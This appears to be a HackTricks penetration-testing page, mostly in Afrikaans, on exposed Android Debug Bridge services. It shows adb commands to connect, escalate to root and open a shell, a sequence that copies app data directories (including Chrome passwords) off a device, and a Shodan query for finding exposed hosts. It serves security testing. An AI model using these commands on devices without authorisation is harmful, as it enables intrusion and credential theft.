# 5555 - Android Debug Bridge {{#include ../banners/hacktricks-training.md}} ## Basiese Inligting From [the docs](https://developer.android.com/studio/command-line/adb): **Android Debug Bridge** (adb) is 'n veelsydige opdraglyn hulpmiddel wat jou toelaat om met 'n toestel te kommunikeer. Die adb-opdrag fasiliteer 'n verskeidenheid toestel aksies, soos i**nstalleer en debugg apps**, en dit bied **toegang tot 'n Unix-skaal** wat jy kan gebruik om 'n verskeidenheid opdragte op 'n toestel uit te voer. **Standaard poort**: 5555. ``` PORT STATE SERVICE VERSION 5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909) ``` ## Verbind As jy die ADB-diens in 'n poort van 'n toestel vind en jy kan daaraan verbind, **kan jy 'n skulp binne die stelsel kry:** ```bash adb connect 10.10.10.10 adb root # Try to escalate to root adb shell ``` Vir meer ADB-opdragte, kyk die volgende bladsy: {{#ref}} ../mobile-pentesting/android-app-pentesting/adb-commands.md {{#endref}} ### Dump App data Om die data van 'n toepassing heeltemal af te laai, kan jy: ```bash # From a root console chmod 777 /data/data/com.package cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data. adb pull "/sdcard/com.package" ``` Jy kan hierdie truuk gebruik om **sensitiewe inligting soos chrome wagwoorde** te **herwin**. Vir meer inligting oor dit, kyk na die inligting en verwysings wat [**hier**](https://github.com/carlospolop/hacktricks/issues/274) verskaf is. ## Shodan - `android debug bridge` {{#include ../banners/hacktricks-training.md}}